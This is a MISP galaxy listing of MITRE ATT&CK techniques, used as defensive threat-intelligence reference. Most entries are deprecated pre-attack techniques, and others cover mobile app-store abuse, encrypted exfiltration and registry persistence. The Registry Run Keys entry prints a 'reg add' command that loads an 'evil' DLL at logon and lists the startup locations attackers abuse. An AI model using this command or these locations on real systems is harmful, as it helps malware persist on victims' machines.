Attack Pattern
ATT&CK tactic
Authors
Authors and/or Contributors |
---|
MITRE |
Test ability to evade automated mobile application security analysis performed by app stores - T1393
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)
Internal MISP references
UUID c9e85b80-39e8-42df-b275-86a2afcea9e8
which can be used as unique global reference for Test ability to evade automated mobile application security analysis performed by app stores - T1393
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1393 |
kill_chain | ['pre-attack:test-capabilities'] |
Choose pre-compromised mobile app developer account credentials or signing keys - T1391
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)
Internal MISP references
UUID 7a265bf0-6acc-4f43-8b22-2e58b443e62e
which can be used as unique global reference for Choose pre-compromised mobile app developer account credentials or signing keys - T1391
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1391 |
kill_chain | ['pre-attack:persona-development'] |
Enumerate externally facing software applications technologies, languages, and dependencies - T1261
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)
Internal MISP references
UUID ef6197fd-a58a-4006-bfd6-1d7765d8409d
which can be used as unique global reference for Enumerate externally facing software applications technologies, languages, and dependencies - T1261
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1261 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Obtain Apple iOS enterprise distribution key pair and certificate - T1392
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)
Internal MISP references
UUID d58f3996-e293-4f69-a2c8-0e1851cb8297
which can be used as unique global reference for Obtain Apple iOS enterprise distribution key pair and certificate - T1392
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1392 |
kill_chain | ['pre-attack:persona-development'] |
Analyze social and business relationships, interests, and affiliations - T1295
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Social media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)
Internal MISP references
UUID ee40d054-6e83-4302-88dc-a3af98821d8d
which can be used as unique global reference for Analyze social and business relationships, interests, and affiliations - T1295
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1295 |
kill_chain | ['pre-attack:people-weakness-identification'] |
Linux and Mac File and Directory Permissions Modification - T1222.002
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown
(short for change owner), and chmod
(short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.(Citation: 20 macOS Common Tools and Techniques)
Internal MISP references
UUID 09b130a2-a77e-4af0-a361-f46f9aad1345
which can be used as unique global reference for Linux and Mac File and Directory Permissions Modification - T1222.002
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1222/002 - webarchive
- https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ - webarchive
- https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - webarchive
- https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1222.002 |
kill_chain | ['attack-macOS:defense-evasion', 'attack-Linux:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Metadata', 'Process: Process Creation'] |
mitre_platforms | ['macOS', 'Linux'] |
Related clusters
To see the related clusters, click here.
Install and configure hardware, network, and systems - T1336
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)
Internal MISP references
UUID 73e394e5-3d8a-40d1-ab8c-a1b4ea9db424
which can be used as unique global reference for Install and configure hardware, network, and systems - T1336
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1336 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Compromise 3rd party or closed-source vulnerability/exploit information - T1354
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)
Internal MISP references
UUID 5a68c603-d7f9-4535-927e-ab56819eaa85
which can be used as unique global reference for Compromise 3rd party or closed-source vulnerability/exploit information - T1354
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1354 |
kill_chain | ['pre-attack:build-capabilities'] |
Discover new exploits and monitor exploit-provider forums - T1350
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)
Internal MISP references
UUID 82bbd209-f516-45e0-9542-4ffbbc2a8717
which can be used as unique global reference for Discover new exploits and monitor exploit-provider forums - T1350
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1350 |
kill_chain | ['pre-attack:build-capabilities'] |
Acquire and/or use 3rd party software services - T1330
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)
Internal MISP references
UUID 488da8ed-2887-4ef6-a39a-5b69bc6682c6
which can be used as unique global reference for Acquire and/or use 3rd party software services - T1330
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1330 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Related clusters
To see the related clusters, click here.
Acquire and/or use 3rd party infrastructure services - T1307
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)
Internal MISP references
UUID 286cc500-4291-45c2-99a1-e760db176402
which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1307
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1307 |
kill_chain | ['pre-attack:adversary-opsec'] |
Related clusters
To see the related clusters, click here.
Acquire and/or use 3rd party software services - T1308
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)
Internal MISP references
UUID 1a295f87-af63-4d94-b130-039d6221fb11
which can be used as unique global reference for Acquire and/or use 3rd party software services - T1308
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1308 |
kill_chain | ['pre-attack:adversary-opsec'] |
Related clusters
To see the related clusters, click here.
Test signature detection for file upload/email filters - T1361
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)
Internal MISP references
UUID c9ac5715-ee5c-4380-baf4-6f12e304ca93
which can be used as unique global reference for Test signature detection for file upload/email filters - T1361
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1361 |
kill_chain | ['pre-attack:test-capabilities'] |
Acquire and/or use 3rd party infrastructure services - T1329
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)
Internal MISP references
UUID 795c1a92-3a26-453e-b99a-6a566aa94dc6
which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1329
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1329 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Related clusters
To see the related clusters, click here.
Acquire or compromise 3rd party signing certificates - T1310
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)
Internal MISP references
UUID e5164428-03ca-4336-a9a7-4d9ea1417e59
which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1310
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1310 |
kill_chain | ['pre-attack:adversary-opsec'] |
Related clusters
To see the related clusters, click here.
Compromise 3rd party infrastructure to support delivery - T1312
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)
Internal MISP references
UUID 4900fabf-1142-4c1f-92f5-0b590e049077
which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1312
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1312 |
kill_chain | ['pre-attack:adversary-opsec'] |
Related clusters
To see the related clusters, click here.
Acquire or compromise 3rd party signing certificates - T1332
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)
Internal MISP references
UUID 03f4a766-7a21-4b5e-9ccf-e0cf422ab983
which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1332
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1332 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Related clusters
To see the related clusters, click here.
Compromise 3rd party infrastructure to support delivery - T1334
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)
Internal MISP references
UUID e51398e6-53dc-4e9f-a323-e54683d8672b
which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1334
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1334 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Related clusters
To see the related clusters, click here.
Human performs requested action of physical nature - T1385
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)
Internal MISP references
UUID fb39384c-00e4-414a-88af-e80c4904e0b8
which can be used as unique global reference for Human performs requested action of physical nature - T1385
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1385 |
kill_chain | ['pre-attack:compromise'] |
Abuse of iOS Enterprise App Signing Key - T1445
An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple's App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).
Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple's App Store.
Platforms: iOS
Internal MISP references
UUID 51aedbd6-2837-4d15-aeb0-cb09f2bf22ac
which can be used as unique global reference for Abuse of iOS Enterprise App Signing Key - T1445
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1445 |
Related clusters
To see the related clusters, click here.
Deliver Malicious App via Authorized App Store - T1475
Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.
App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:
Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)
Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)
Adversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)
Internal MISP references
UUID d9db3d46-66ca-44b4-9daa-1ef97cb7465a
which can be used as unique global reference for Deliver Malicious App via Authorized App Store - T1475
in MISP communities and other software using the MISP galaxy
External references
- http://dl.acm.org/citation.cfm?id=2592796 - webarchive
- http://www.vvdveen.com/publications/BAndroid.pdf - webarchive
- https://attack.mitre.org/techniques/T1475 - webarchive
- https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/ - webarchive
- https://jon.oberheide.org/files/summercon12-bouncer.pdf - webarchive
- https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html - webarchive
- https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1475 |
kill_chain | ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access'] |
mitre_platforms | ['Android', 'iOS'] |
Device Unlock Code Guessing or Brute Force - T1459
An adversary could make educated guesses of the device lock screen's PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).
Platforms: Android, iOS
Internal MISP references
UUID f296fc9c-2ff5-43ee-941e-6b49c438270a
which can be used as unique global reference for Device Unlock Code Guessing or Brute Force - T1459
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1459 |
Related clusters
To see the related clusters, click here.
Assign KITs, KIQs, and/or intelligence requirements - T1238
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)
Internal MISP references
UUID 4fad17d3-8f42-449d-ac4b-dbb4c486127d
which can be used as unique global reference for Assign KITs, KIQs, and/or intelligence requirements - T1238
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1238 |
kill_chain | ['pre-attack:priority-definition-direction'] |
Assess current holdings, needs, and wants - T1236
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)
Internal MISP references
UUID 8e927b19-04a6-4aaa-a42f-4f0a53411d27
which can be used as unique global reference for Assess current holdings, needs, and wants - T1236
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1236 |
kill_chain | ['pre-attack:priority-definition-planning'] |
Submit KITs, KIQs, and intelligence requirements - T1237
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)
Internal MISP references
UUID 03da0598-ed46-4a73-bf43-0313b3522400
which can be used as unique global reference for Submit KITs, KIQs, and intelligence requirements - T1237
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1237 |
kill_chain | ['pre-attack:priority-definition-direction'] |
Common, high volume protocols and software - T1321
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)
Internal MISP references
UUID 0c592c79-29a7-4a94-81a4-c87eae3aead6
which can be used as unique global reference for Common, high volume protocols and software - T1321
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1321 |
kill_chain | ['pre-attack:adversary-opsec'] |
Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001
Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).
Internal MISP references
UUID 79a4052e-1a89-4b09-aea6-51f1d11fe19c
which can be used as unique global reference for Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1048.001 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002
Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.
Internal MISP references
UUID 8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5
which can be used as unique global reference for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1048.002 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Non-traditional or less attributable payment options - T1316
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)
Internal MISP references
UUID b79e8a3f-a109-47c2-a0e3-564955590a3d
which can be used as unique global reference for Non-traditional or less attributable payment options - T1316
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1316 |
kill_chain | ['pre-attack:adversary-opsec'] |
Choose pre-compromised persona and affiliated accounts - T1343
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)
Internal MISP references
UUID 9a8c47f6-ae69-4044-917d-4b1602af64d9
which can be used as unique global reference for Choose pre-compromised persona and affiliated accounts - T1343
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1343 |
kill_chain | ['pre-attack:persona-development'] |
Malicious or Vulnerable Built-in Device Functionality - T1473
The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.
Platforms: Android, iOS
Internal MISP references
UUID f9e4f526-ac9d-4df5-8949-833a82a1d2df
which can be used as unique global reference for Malicious or Vulnerable Built-in Device Functionality - T1473
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1473 |
Related clusters
To see the related clusters, click here.
Identify vulnerabilities in third-party software libraries - T1389
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)
Internal MISP references
UUID ad124f84-52d2-40e3-95dd-cfdd44eae6ef
which can be used as unique global reference for Identify vulnerabilities in third-party software libraries - T1389
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1389 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Registry Run Keys / Startup Folder - T1547.001
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"
(Citation: Oddvar Moe RunOnceEx Mar 2018)
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
.
The following Registry keys can be used to set startup folder items for persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
run automatically for the currently logged-on user.
By default, the multistring BootExecute
value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
is set to autocheck autochk *
. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Internal MISP references
UUID 9efb1ea7-c37b-4595-9640-b7680cd84279
which can be used as unique global reference for Registry Run Keys / Startup Folder - T1547.001
in MISP communities and other software using the MISP galaxy
External references
- http://msdn.microsoft.com/en-us/library/aa376977 - webarchive
- https://attack.mitre.org/techniques/T1547/001 - webarchive
- https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ - webarchive
- https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry - webarchive
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - webarchive
